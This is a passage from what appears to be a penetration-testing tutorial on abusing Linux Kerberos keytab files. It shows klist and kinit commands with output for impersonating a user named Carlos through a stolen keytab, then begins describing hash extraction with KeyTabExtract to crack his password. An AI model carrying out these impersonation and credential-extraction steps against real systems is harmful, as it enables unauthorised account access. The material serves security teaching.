As attackers, we may have several uses for a keytab file. The first thing we can do is impersonate a user using kinit. To use a keytab file, we need to know which user it was created for. klist is another application used to interact with Kerberos on Linux. This application reads information from a keytab file. Let's see that with the following command:
david@linux01:~$ klist -k -t /opt/specialfiles/carlos.keytab
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 10/06/2022 17:09:13 [email protected]
The ticket corresponds to the user Carlos. We can now impersonate the user with kinit. Let's confirm which ticket we are using with klist and then import Carlos's ticket into our session with kinit.
Note: kinit is case-sensitive, so be sure to use the name of the principal as shown in klist. In this case, the username is lowercase, and the domain name is uppercase.
david@linux01:~$ klist Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: [email protected]
Valid starting Expires Service principal
10/06/22 17:02:11 10/07/22 03:02:11 krbtgt/[email protected]
renew until 10/07/22 17:02:11
davidb@linux01:~$ kinit [email protected] -k -t /opt/specialfiles/carlos.keytab
david@linux01:~$ klist Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: [email protected]
Valid starting Expires Service principal
10/06/22 17:16:11 10/07/22 03:16:11 krbtgt/[email protected]
renew until 10/07/22 17:16:11
The second method we will use to abuse Kerberos on Linux is extracting the secrets from a keytab file. We were able to impersonate Carlos using the account's tickets to read a shared folder in the domain, but if we want to gain access to his account on the Linux machine, we'll need his password.
We can attempt to crack the account's password by extracting the hashes from the keytab file. Let's use KeyTabExtract, a tool to extract valuable information from 502-type .keytab files, which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm, Service Principal, Encryption Type, and Hashes.